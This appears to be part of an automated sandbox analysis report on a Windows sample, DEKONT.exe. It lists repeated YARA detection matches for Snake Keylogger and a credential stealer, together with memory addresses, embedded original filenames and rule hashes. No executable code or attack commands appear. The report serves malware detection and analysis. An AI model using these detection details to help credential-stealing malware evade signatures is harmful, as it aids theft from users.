                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_017FDFE40_2_017FDFE4
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_032A12A00_2_032A12A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_05976E400_2_05976E40
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059705980_2_05970598
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059705890_2_05970589
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_05976E310_2_05976E31
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059A76840_2_059A7684
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059A766D0_2_059A766D
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059ABC200_2_059ABC20
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB04B80_2_07AB04B8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB01A00_2_07AB01A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABC7A80_2_07ABC7A8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABC7B80_2_07ABC7B8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB04A80_2_07AB04A8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB01900_2_07AB0190
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB11390_2_07AB1139
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABB1010_2_07ABB101
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB11480_2_07AB1148
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB3FA10_2_07AB3FA1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB3FB00_2_07AB3FB0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB3F500_2_07AB3F50
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABACD80_2_07ABACD8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB7C380_2_07AB7C38
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABCBF00_2_07ABCBF0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB2A800_2_07AB2A80
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07AB2A6F0_2_07AB2A6F
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCB3883_2_02DCB388
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCC1F03_2_02DCC1F0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DC61683_2_02DC6168
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCC7B23_2_02DCC7B2
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCC4D03_2_02DCC4D0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCCA923_2_02DCCA92
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DC4B313_2_02DC4B31
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DC68E03_2_02DC68E0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DC98B83_2_02DC98B8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCBF103_2_02DCBF10
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCBC323_2_02DCBC32
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCF4E83_2_02DCF4E8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DC35CA3_2_02DC35CA
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCB5523_2_02DCB552
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCEA083_2_02DCEA08
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCE9F83_2_02DCE9F8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DCF9413_2_02DCF941
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B244903_2_05B24490
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B289B03_2_05B289B0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B290803_2_05B29080
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2DB183_2_05B2DB18
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B21DE03_2_05B21DE0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B21DD03_2_05B21DD0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B215203_2_05B21520
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2F5283_2_05B2F528
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B215103_2_05B21510
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2F5183_2_05B2F518
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2C5603_2_05B2C560
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2C5503_2_05B2C550
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B244803_2_05B24480
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2EC783_2_05B2EC78
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B20C603_2_05B20C60
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2EC693_2_05B2EC69
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B20C503_2_05B20C50
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B27FF83_2_05B27FF8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2DF703_2_05B2DF70
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2DF603_2_05B2DF60
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2D6B03_2_05B2D6B0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2D6C03_2_05B2D6C0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2CE103_2_05B2CE10
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2CE013_2_05B2CE01
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2C9B83_2_05B2C9B8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2C9A93_2_05B2C9A9
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B219803_2_05B21980
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2F9803_2_05B2F980
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2C1083_2_05B2C108
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2F9733_2_05B2F973
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B219703_2_05B21970
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B210B03_2_05B210B0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2C0F73_2_05B2C0F7
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2F0D03_2_05B2F0D0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B210C03_2_05B210C0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2F0C03_2_05B2F0C0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2E8203_2_05B2E820
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2E8113_2_05B2E811
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B200063_2_05B20006
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B280083_2_05B28008
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B200403_2_05B20040
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2E3BB3_2_05B2E3BB
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2E3C83_2_05B2E3C8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2DB093_2_05B2DB09
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2D2683_2_05B2D268
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_05B2D2583_2_05B2D258
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEDAC03_2_06CEDAC0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEAEA83_2_06CEAEA8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE8A583_2_06CE8A58
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CECE283_2_06CECE28
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEC7D83_2_06CEC7D8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEBB383_2_06CEBB38
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEB4F03_2_06CEB4F0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE90A13_2_06CE90A1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEA8583_2_06CEA858
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CED4783_2_06CED478
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE70203_2_06CE7020
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE15F83_2_06CE15F8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEC1883_2_06CEC188
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE5EC03_2_06CE5EC0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEAE983_2_06CEAE98
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEDABB3_2_06CEDABB
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEDAB73_2_06CEDAB7
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE5EB13_2_06CE5EB1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE8A483_2_06CE8A48
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE5A583_2_06CE5A58
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE5A683_2_06CE5A68
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE86003_2_06CE8600
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CECE233_2_06CECE23
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE6BC83_2_06CE6BC8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEC7C93_2_06CEC7C9
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE37FB3_2_06CE37FB
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE3B803_2_06CE3B80
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE6BB83_2_06CE6BB8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE67603_2_06CE6760
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE67703_2_06CE6770
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE63083_2_06CE6308
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE63183_2_06CE6318
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEBB273_2_06CEBB27
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE78E73_2_06CE78E7
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEB4E03_2_06CEB4E0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE08E13_2_06CE08E1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE78F83_2_06CE78F8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE08F03_2_06CE08F0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE04883_2_06CE0488
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE48803_2_06CE4880
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE04983_2_06CE0498
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE74903_2_06CE7490
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE74A03_2_06CE74A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEA8483_2_06CEA848
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE00403_2_06CE0040
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE2C683_2_06CE2C68
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CED4733_2_06CED473
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE38083_2_06CE3808
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE00063_2_06CE0006
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE70103_2_06CE7010
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE55D93_2_06CE55D9
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE55E83_2_06CE55E8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE85F13_2_06CE85F1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE819B3_2_06CE819B
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE11913_2_06CE1191
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE81A83_2_06CE81A8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE11A03_2_06CE11A0
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE0D483_2_06CE0D48
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE7D403_2_06CE7D40
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE7D503_2_06CE7D50
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEC1783_2_06CEC178
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE0D383_2_06CE0D38
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06D0FA323_2_06D0FA32
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06D0BFEC3_2_06D0BFEC
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06D0DC483_2_06D0DC48
                  Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DEKONT.exe
                  Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DEKONT.exe
                  Source: DEKONT.exe, 00000000.00000002.1373034560.0000000003210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DEKONT.exe
                  Source: DEKONT.exe, 00000000.00000002.1373381739.00000000034E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DEKONT.exe
                  Source: DEKONT.exe, 00000000.00000000.1356401634.000000000108C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYaaO.exeL vs DEKONT.exe
                  Source: DEKONT.exe, 00000000.00000002.1372333783.000000000161E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DEKONT.exe
                  Source: DEKONT.exe, 00000003.00000002.3819949173.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DEKONT.exe
                  Source: DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DEKONT.exe
                  Source: DEKONT.exeBinary or memory string: OriginalFilenameYaaO.exeL vs DEKONT.exe
                  Source: DEKONT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
